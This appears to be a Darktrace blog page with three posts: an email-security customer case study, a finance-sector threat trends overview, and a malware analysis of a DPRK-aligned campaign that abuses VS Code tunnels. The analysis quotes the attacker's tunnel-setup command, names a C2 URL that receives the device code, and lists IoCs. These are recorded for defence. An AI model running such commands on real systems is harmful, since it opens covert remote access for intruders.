Blog
/
Email
/
January 14, 2025

Por qué la protección del Email basada en IA se volvió esencial para este íder mundial en servicios financieros

Hear the cybersecurity transformation story of this leading money transmitter, who facilitates more than $9 billion in remittances via thousands of agent locations across the US serving more than two million active customers.
Written by
The Darktrace Community
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
The Darktrace Community
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
14
Jan 2025

When agile cyber-attackers don’t stop, but pivot  

When he first joined this leading financial services provider, it was clear to the CISO that email security needed to be a top priority. The organization provides transfer services to millions of consumers via a network of thousands of agent locations across the US. Those agents are connected to hundreds of thousands of global payers to complete consumer transfers, ranging from leading financial institutions to small local businesses.

With this vast network of agents and payers, the provider relies on email as its primary communications channel. Transmitting billions of dollars every year, the organization is a prime target for cyber criminals looking to steal credentials, financial assets, and sensitive data.

Vulnerable to attacks with gaps in email security and visibility

The CISO discovered that employees were under constant attack by phishing emails impersonating his company’s own executives. The business email compromise (BEC) attacks were designed to deceive employees into sharing credentials or clicking on malicious links.

Upon discovering that their Microsoft 365 tenant lacked secure configuration, the CISO implemented necessary changes to strengthen the service, including enabling authentication controls. While his efforts significantly reduced BEC attacks, cyber criminals changed their tactics, sending employees malicious phishing emails from seemingly valid email accounts from trusted domains like Google and Yahoo. The emails passed through the organization’s native email filters without detection.

The CISO also sought to strengthen defenses against third-party supply chain attacks that could originate with any of the hundreds of thousands of third-party agents and payers the company works with around the world. While the larger institutions typically have sophisticated email security strategies in place, the smaller businesses may lack the cybersecurity expertise needed to effectively secure and manage their data, putting the organization at risk.

While the CISO knew the company was vulnerable to phishing and third-party threats, he didn’t have visibility across the flow of email. Without access to key metrics and valuable data, he couldn’t get the crucial insights needed to quickly identify possible threats and adjust security protocols.  

Skilled analysts bogged down with low-level tasks

Like many enterprise organizations, this leading financial services provider relied on a crew of highly skilled analysts to respond to alerts and analyze and triage emails most of their workday. “That shouldn’t be how we operate,” said the CISO. “My role and the role of my staff should be to focus on more strategic projects, support the business, and work on important new product development.”

Balancing user experience with mitigating threats

Enabling greater email security measures without negatively impacting the business, user experience, and customer satisfaction was a daunting challenge the CISO and his security team faced. Imposing restrictions that are too stringent could restrict communication, delay the delivery of important messages, or block legitimate emails – potentially slowing down money transfers, frustrating customers, affecting employee productivity, and impacting revenue. However, maintaining controls that are too permissive could result in serious outcomes like data theft, financial fraud, operational disruption, compliance penalties, and customer attrition.  

Self-Learning AI is a game changer

After conducting a thorough POC with several modern security solution providers, this global financial services provider chose the Darktrace / EMAIL an AI-driven email security platform. The CISO said they chose the solution for two key reasons:

First, Darktrace / EMAIL offers modern capabilities

  • Self-Learning AI uses business data to recognize anomalies in communication patterns and user behavior to stop known and unknown threats
  • Secures the organization’s entire mailflow across all inbound, outbound, and lateral email
  • Protects against account takeover attacks by identifying subtle anomalies in cloud SaaS
  • Catches sophisticated threats like impersonations, session token misuse, adversary-in-the-middle attacks, credential theft, and data exfiltration

Second, they pointed to Darktrace’s experience, innovation, and expertise

  • Deep cybersecurity and industry knowledge
  • Demonstrated customers successes worldwide
  • At the forefront of innovation and research, establishing new thresholds in cybersecurity, with technology advances backed by over 200 patents and pending applications

Moreover, and most importantly, this organization trusted Darktrace to deliver on its promises.  And according to the CISO, that’s just what happened.

Significantly reduced phishing threats and business risk

Since implementing Darktrace / EMAIL, the threat posed by BEC attacks has dropped sharply. “Phishing is not an issue that concerns me anymore. I estimate we are now identifying and blocking more than 85% of threats our previous solution was missing,” said the CISO. The biggest factor contributing to this success? The power of AI.

With Darktrace / EMAIL, this leadingglobal financial services provider is identifying and blocking more than 85% ofthe phishing email threats its previous solution missed.

AI wasn’t originally on the financial service provider’s list of criteria. But after seeing AI in action and understanding its potential to vastly scale their detection and response capabilities–without adding headcount, the CISO determined AI wasn’t an option but an imperative. “AI is essential when it comes to email security, it’s an absolute necessity,” he said.  

Darktrace / EMAIL’s Self-Learning AI is uniquely powerful because it learns the content and context of every internal and external user and can spot the subtle differences in behavioral patterns that point to possible social engineering attacks. Through patented behavioral anomaly detection, Darktrace / EMAIL continuously learns about the organization’s business and users, based on its own operations and data, adjusting security protocols accordingly.  

For example, when clients are transferring large amounts of money, they are required to send photos of their driver’s licenses and passports via email to the organization for verification – accounting for a large percentage of its’ inbound email. Darktrace / EMAIL recognizes that it’s normal for customers to send this sensitive information, and it also knows that it’s not normal for that same sensitive information to leave the organization via outbound mail. In addition, Darktrace identifies patterns in user behavior, including who employees communicate with and what kind of information they share. When user behavior falls outside of established norms, such as an email sent from the CFO to employees the CEO would not typically communicate with, Darktrace can take the appropriate action to remove the threat.  

“After the implementation, we gave the solution two weeks to ingest our data and learn the specifics of our business. After that, it was perfect, just amazing,” said the CISO.  

Boosted team productivity and elevated value to the business

With Darktrace / EMAIL, the organization has successfully scaled its detection and response efforts without scaling personnel. The security team has reduced the number of emails requiring manual investigation by 90%. And because analysts now have the benefit of Darktrace / EMAIL’s analytics and reporting, the investigation process is much easier and faster. “The impact of this solution on my team has been very positive,” said the CISO. “Darktrace / EMAIL essentially manages itself, freeing up time for our skilled analysts–and for myself–to focus on more important projects.”  

The security team has scaled its detection and response efforts without scaling personnel,reducing the number of emails it manually investigates by 90%

Increased visibility delivers business-critical insights

You can’t control what you can’t see, and with zero visibility into critical data and metrics, this financial services provider was at a serious disadvantage. That has all changed. “Something that I love about Darktrace / EMAIL is the visibility that it provides into key metrics from a single dashboard. We can now understand the behavior of our email flow and data traffic and can make insight-driven decisions to continuously optimize our email security. It’s awesome,” said the CISO.  

An efficient user interface also improves productivity and reduces mean time to action by enabling teams to easily visualize key data points and quickly evaluate what actions need to be taken. Darktrace / EMAIL was developed with that experience in mind, allowing users to access data and take quick action without having to constantly log into the solution.

Keeping the business focused on cybersecurity

The leadership of this global organization takes information security very seriously, understanding that cyber-attacks aren’t just an IT problem but a business problem. When it came to evaluating Darktrace, the CISO said numerous stakeholders were involved including C-level executives, infrastructure, and IT, which operates separately from information security. The CISO initially identified the need, conducted the market research, engaged the target vendors, and then brought the other decision makers into the process for the solution evaluation and final decision. “Our IT group, infrastructure team, CTO and CEO are all involved when it comes to making major cybersecurity investments. We always try to make these decisions jointly to ensure we are taking everything into consideration.”

The organization has reached a higher level of maturity when it comes to email cybersecurity. The ability to automate routine email detection and investigation tasks has both strengthened the organization’s cyber resilience and enabled the CISO and his team to contribute more to the business. His advice for other IT leaders facing the same email security and visibility challenges he once experienced: “For those companies that need greater insight and control over their email but have limited resources and people, AI is the answer.”  

Darktrace / Email solution brief screenshot

Secure Your Inbox with Cutting-Edge AI Email Protection

Discover the most advanced cloud-native AI email security solution to protect your domain and brand while preventing phishing, novel social engineering, business email compromise, account takeover, and data loss.

  • Gain up to 13 days of earlier threat detection and maximize ROI on your current email security
  • Experience 20-25% more threat blocking power with Darktrace / EMAIL
  • Stop the 58% of threats bypassing traditional email security

Written by
The Darktrace Community
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
The Darktrace Community

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

Network
January 21, 2026
Watch the NIS2 Webinar
Trending blogs
1
Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD
Nov 19, 2025
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
Continue reading
Email
December 18, 2025

Why Organizations are Moving to Label-free, Behavioral DLP for Outbound Email

Modern data loss doesn’t always look like a regex match. It can look like everyday communication slightly out of context. Here’s how a domain specific language model paired with behavioral learning protects labeled and unlabeled data without slowing business down.
Carlos Gray
Senior Product Marketing Manager, Email
Read more
Email
December 15, 2025

Beyond MFA: Detecting Adversary-in-the-Middle Attacks and Phishing with Darktrace

During a customer trial of Darktrace / EMAIL and Darktrace / IDENTITY, Darktrace detected an adversary-in-the-middle (AiTM) attack that compromised a user’s Office 365 account via a business email compromise (BEC) phishing email. Following the breach, the compromised account was used to launch both internal and external phishing campaigns.
Read more
Email
December 4, 2025

How Darktrace is ending email security silos with new capabilities in cross-domain detection, DLP, and native Microsoft integrations

Darktrace is delivering a major evolution in email security, uniting true AI-powered cross-domain detection, label-free behavioral DLP, and Microsoft-native automation – to catch the 17% of threats that SEGs miss.
Carlos Gray
Senior Product Marketing Manager, Email
Read more

Blog

/

Network

/

January 28, 2026

The State of Cybersecurity in the Finance Sector: Six Trends to Watch

Default blog imageDefault blog image

The evolving cybersecurity threat landscape in finance

The financial sector, encompassing commercial banks, credit unions, financial services providers, and cryptocurrency platforms, faces an increasingly complex and aggressive cyber threat landscape. The financial sector’s reliance on digital infrastructure and its role in managing high-value transactions make it a prime target for both financially motivated and state-sponsored threat actors.

Darktrace’s latest threat research, The State of Cybersecurity in the Finance Sector, draws on a combination of Darktrace telemetry data from real-world customer environments, open-source intelligence, and direct interviews with financial-sector CISOs to provide perspective on how attacks are unfolding and how defenders in the sector need to adapt.  

Six cybersecurity trends in the finance sector for 2026

1. Credential-driven attacks are surging

Phishing continues to be a leading initial access vector for attacks targeting confidentiality. Financial institutions are frequently targeted with phishing emails designed to harvest login credentials. Techniques including Adversary-in-The-Middle (AiTM) to bypass Multi-factor Authentication (MFA) and QR code phishing (“quishing”) are surging and are capable of fooling even trained users. In the first half of 2025, Darktrace observed 2.4 million phishing emails within financial sector customer deployments, with almost 30% targeted towards VIP users.  

2. Data Loss Prevention is an increasing challenge

Compliance issues – particularly data loss prevention -- remain a persistent risk. In October 2025 alone, Darktrace observed over 214,000 emails across financial sector customers that contained unfamiliar attachments and were sent to suspected personal email addresses highlighting clear concerns around data loss prevention. Across the same set of customers within the same time frame, more than 351,000 emails containing unfamiliar attachments were sent to freemail addresses (e.g. gmail, yahoo, icloud), highlighting clear concerns around DLP.  

Confidentiality remains a primary concern for financial institutions as attackers increasingly target sensitive customer data, financial records, and internal communications.  

3. Ransomware is evolving toward data theft and extortion

Ransomware is no longer just about locking systems, it’s about stealing data first and encrypting second. Groups such as Cl0p and RansomHub now prioritize exploiting trusted file-transfer platforms to exfiltrate sensitive data before encryption, maximizing regulatory and reputational fallout for victims.  

Darktrace’s threat research identified routine scanning and malicious activity targeting internet-facing file-transfer systems used heavily by financial institutions. In one notable case involving Fortra GoAnywhere MFT, Darktrace detected malicious exploitation behavior six days before the CVE was publicly disclosed, demonstrating how attackers often operate ahead of patch cycles

This evolution underscores a critical reality: by the time a vulnerability is disclosed publicly, it may already be actively exploited.

4. Attackers are exploiting edge devices, often pre-disclosure.  

VPNs, firewalls, and remote access gateways have become high-value targets, and attackers are increasingly exploiting them before vulnerabilities are publicly disclosed. Darktrace observed pre-CVE exploitation activity affecting edge technologies including Citrix, Palo Alto, and Ivanti, enabling session hijacking, credential harvesting, and privileged lateral movement into core banking systems.  

Once compromised, these edge devices allow adversaries to blend into trusted network traffic, bypassing traditional perimeter defenses. CISOs interviewed for the report repeatedly described VPN infrastructure as a “concentrated focal point” for attackers, especially when patching and segmentation lag behind operational demands.

5. DPRK-linked activity is growing across crypto and fintech.  

State-sponsored activity, particularly from DPRK-linked groups affiliated with Lazarus, continues to intensify across cryptocurrency and fintech organizations. Darktrace identified coordinated campaigns leveraging malicious npm packages, previously undocumented BeaverTail and InvisibleFerret malware, and exploitation of React2Shell (CVE-2025-55182) for credential theft and persistent backdoor access.  

Targeting was observed across the United Kingdom, Spain, Portugal, Sweden, Chile, Nigeria, Kenya, and Qatar, highlighting the global scope of these operations.  

7. Cloud complexity and AI governance gaps are now systemic risks.  

Finally, CISOs consistently pointed to cloud complexity, insider risk from new hires, and ungoverned AI usage exposing sensitive data as systemic challenges. Leaders emphasized difficulty maintaining visibility across multi-cloud environments while managing sensitive data exposure through emerging AI tools.  

Rapid AI adoption without clear guardrails has introduced new confidentiality and compliance risks, turning governance into a board-level concern rather than a purely technical one.

Building cyber resilience in a shifting threat landscape

The financial sector remains a prime target for both financially motivated and state-sponsored adversaries. What this research makes clear is that yesterday’s security assumptions no longer hold. Identity attacks, pre-disclosure exploitation, and data-first ransomware require adaptive, behavior-based defenses that can detect threats as they emerge, often ahead of public disclosure.

As financial institutions continue to digitize, resilience will depend on visibility across identity, edge, cloud, and data, combined with AI-driven defense that learns at machine speed.  

Learn more about the threats facing the finance sector, and what your organization can do to keep up in The State of Cybersecurity in the Finance Sector report here.  

Acknowledgements:

The State of Cybersecurity in the Finance sector report was authored by Calum Hall, Hugh Turnbull, Parvatha Ananthakannan, Tiana Kelly, and Vivek Rajan, with contributions from Emma Foulger, Nicole Wong, Ryan Traill, Tara Gould, and the Darktrace Threat Research and Incident Management teams.

[related-resource]  

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO

Blog

/

Network

/

January 23, 2026

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

campaign targeting south orea leveraging vs code for remote accessDefault blog imageDefault blog image

Introduction

Darktrace analysts recently identified a campaign aligned with Democratic People’s Republic of Korea (DPRK) activity that targets users in South Korea, leveraging Javascript Encoded (JSE) scripts and government-themed decoy documents to deploy a Visual Studio Code (VS Code) tunnel to establish remote access.

Technical analysis

Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.
Figure 1: Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.

The sample observed in this campaign is a JSE file disguised as a Hangul Word Processor (HWPX) document, likely sent to targets via a spear-phishing email. The JSE file contains multiple Base64-encoded blobs and is executed by Windows Script Host. The HWPX file is titled “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026 (1)” in C:\ProgramData and is opened as a decoy. The Hangul documents impersonate the Ministry of Personnel Management, a South Korean government agency responsible for managing the civil service. Based on the metadata within the documents, the threat actors appear to have taken the documents from the government’s website and edited them to appear legitimate.

Base64 encoded blob.
Figure 2: Base64 encoded blob.

The script then downloads the VSCode CLI ZIP archives from Microsoft into C:\ProgramData, along with code.exe (the legitimate VS Code executable) and a file named out.txt.

In a hidden window, the command cmd.exe /c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene > "C:\ProgramData\out.txt" 2>&1 is run, establishinga VS Code tunnel named “bizeugene”.

VSCode Tunnel setup.
Figure 3: VSCode Tunnel setup.

VS Code tunnels allows users connect to a remote computer and use Visual Studio Code. The remote computer runs a VS Code server that creates an encrypted connection to Microsoft’s tunnel service. A user can then connect to that machine from another device using the VS Code application or a web browser after signing in with GitHub or Microsoft. Abuse of VS Code tunnels was first identified in 2023 and has since been used by Chinese Advance Persistent Threat (APT) groups targeting digital infrastructure and government entities in Southeast Asia [1].

Contents of out.txt.
Figure 4: Contents of out.txt.

The file “out.txt” contains VS Code Server logs along with a generated GitHub device code. Once the threat actor authorizes the tunnel from their GitHub account, the compromised system is connected via VS Code. This allows the threat actor to have interactive access over the system, with access to the VS Code’s terminal and file browser, enabling them to retrieve payloads and exfiltrate data.

GitHub screenshot after connection is authorized.
Figure 5: GitHub screenshot after connection is authorized.

This code, along with the tunnel token “bizeugene”, is sent in a POST request to hxxps://www[.]yespp[.]co[.]kr/common/include/code/out[.]php, a legitimate South Korean site that has been compromised is now used as a command-and-control (C2) server.

Conclusion

The use of Hancom document formats, DPRK government impersonation, prolonged remote access, and the victim targeting observed in this campaign are consistent with operational patterns previously attributed to DPRK-aligned threat actors. While definitive attribution cannot be made based on this sample alone, the alignment with established DPRK tactics, techniques, and procedures (TTPs) increases confidence that this activity originates from a DPRK state-aligned threat actor.

This activity shows how threat actors can use legitimate software rather than custom malware to maintain access to compromised systems. By using VS Code tunnels, attackers are able to communicate through trusted Microsoft infrastructure instead of dedicated C2 servers. The use of widely trusted applications makes detection more difficult, particularly in environments where developer tools are commonly installed. Traditional security controls that focus on blocking known malware may not identify this type of activity, as the tools themselves are not inherently malicious and are often signed by legitimate vendors.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Appendix

Indicators of Compromise (IoCs)

115.68.110.73 - compromised site IP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATTACK

T1566.001 - Phishing: Attachment

T1059 - Command and Scripting Interpreter

T1204.002 - User Execution

T1027 - Obfuscated Files and Information

T1218 - Signed Binary Proxy Execution

T1105 - Ingress Tool Transfer

T1090 - Proxy

T1041 - Exfiltration Over C2 Channel

References

[1]  https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

Continue reading
About the author
Your data. Our AI.
Elevate your network security with Darktrace AI